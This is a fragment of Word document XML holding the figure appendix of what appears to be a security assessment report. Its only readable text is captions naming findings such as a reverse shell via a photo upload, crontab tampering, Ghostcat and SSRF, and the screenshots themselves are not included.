          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBBE066" w14:textId="77777777" w:rsidR="00DB53DF" w:rsidRPr="00D77DFE" w:rsidRDefault="00DB53DF" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C9052E4" w14:textId="376CA8FD" w:rsidR="00DB53DF" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="00DB53DF">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="241" w:name="FigureA51"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08268F3C" wp14:editId="4A51B847">
            <wp:extent cx="3776017" cy="1903227"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="48603841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038412" name="Picture 16"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788042" cy="1909288"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="241"/>
    </w:p>
    <w:p w14:paraId="410497D8" w14:textId="4AFF4276" w:rsidR="00DB53DF" w:rsidRPr="00D77DFE" w:rsidRDefault="00DB53DF" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>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Figure A.5.1 Upload Profile Photo Tool</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71691A80" w14:textId="77777777" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C72F5ED" w14:textId="77777777" w:rsidR="002D6FEB" w:rsidRDefault="002D6FEB" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="242" w:name="FigureA52"/>
    </w:p>
    <w:p w14:paraId="42C374D6" w14:textId="48B1EA36" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C176092" wp14:editId="5FDD527A">
            <wp:extent cx="3493698" cy="2066925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="274857653" name="Picture 17"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57653" name="Picture 17" descr="A computer screen shot of white text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId64">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="35278"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3494606" cy="2067462"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="242"/>
    </w:p>
    <w:p w14:paraId="36E21315" w14:textId="3DA585B4" w:rsidR="00DB53DF" w:rsidRPr="00D77DFE" w:rsidRDefault="00DB53DF" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Figure A.5.2 Reverse Shell via Profile Photo Tool</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B11D936" w14:textId="77777777" w:rsidR="00DB53DF" w:rsidRPr="00D77DFE" w:rsidRDefault="00DB53DF" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F660384" w14:textId="77777777" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6118D236" w14:textId="77777777" w:rsidR="006923B6" w:rsidRPr="00D77DFE" w:rsidRDefault="006923B6" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39BAF9F6" w14:textId="77777777" w:rsidR="006923B6" w:rsidRPr="00D77DFE" w:rsidRDefault="006923B6" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="455A3177" w14:textId="77777777" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="243" w:name="_Figure_A.6_Unauthorized"/>
      <w:bookmarkStart w:id="244" w:name="FigureA6"/>
      <w:bookmarkEnd w:id="243"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3065C71B" wp14:editId="296192C9">
            <wp:extent cx="4078634" cy="2726245"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23715457" name="Picture 2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5457" name="Picture 27" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4087379" cy="2732090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="244"/>
    </w:p>
    <w:p w14:paraId="56936623" w14:textId="12072641" w:rsidR="00DB53DF" w:rsidRPr="00D77DFE" w:rsidRDefault="00DB53DF" w:rsidP="00DB53DF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure A.6 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unauthorized modification of scheduled jobs (crontab)</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710AB803" w14:textId="77777777" w:rsidR="00DB53DF" w:rsidRPr="00D77DFE" w:rsidRDefault="00DB53DF" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CE487F0" w14:textId="77777777" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="245" w:name="FigureA7"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FD039D5" wp14:editId="13B9EE59">
            <wp:extent cx="4810125" cy="1660575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="443436055"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436055" name="Picture 16" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrec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868920" cy="1680873"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="245"/>
    </w:p>
    <w:p w14:paraId="57D33285" w14:textId="3753599D" w:rsidR="00DB53DF" w:rsidRPr="00D77DFE" w:rsidRDefault="00DB53DF" w:rsidP="00DB53DF">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Figure A.7 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CVE‑2020‑1938 (Ghostcat) Vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0676D6BF" w14:textId="77777777" w:rsidR="00DB53DF" w:rsidRPr="00D77DFE" w:rsidRDefault="00DB53DF" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74CA1858" w14:textId="77777777" w:rsidR="002D6FEB" w:rsidRDefault="002D6FEB" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="246" w:name="FigureA8"/>
    </w:p>
    <w:p w14:paraId="55CFC4EE" w14:textId="7656A378" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46AD9B9E" wp14:editId="4A172E43">
            <wp:extent cx="4485735" cy="1991995"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1692622456"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22456" name="Picture 15" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId67">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="16915"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4486091" cy="1992153"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="246"/>
    </w:p>
    <w:p w14:paraId="7E41EE6F" w14:textId="13A1B940" w:rsidR="00DB53DF" w:rsidRPr="00D77DFE" w:rsidRDefault="00DB53DF" w:rsidP="00DB53DF">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure A.8 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>SSRF that accesses internal services (ports 631 and 8081)</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A40BF4E" w14:textId="77777777" w:rsidR="00DB53DF" w:rsidRPr="00D77DFE" w:rsidRDefault="00DB53DF" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DC0C3AF" w14:textId="77777777" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="247" w:name="FigureA9"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31455DCB" wp14:editId="47C3A75C">
            <wp:extent cx="4399471" cy="1880962"/>
            <wp:effectExtent l="0" t="0" r="1270" b="5080"/>
            <wp:docPr id="31365566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5666" name="Picture 14"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415061" cy="1887627"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="247"/>
    </w:p>
    <w:p w14:paraId="0F44EF6B" w14:textId="3E4C7E3A" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="005F3C61">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure A.9 </w:t>
      </w:r>
      <w:r w:rsidR="00DB53DF" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Decoding the Encoded Value Using Cyberchef Tool</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5223EB1F" w14:textId="77777777" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="046B5C01" w14:textId="1609BC20" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="248" w:name="FigureA10"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29F6F32E" wp14:editId="4D4574DF">
            <wp:extent cx="4582632" cy="2490340"/>
            <wp:effectExtent l="0" t="0" r="8890" b="5715"/>
            <wp:docPr id="559152889" name="Picture 2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2889" name="Picture 24" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4593513" cy="2496253"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="248"/>
    </w:p>
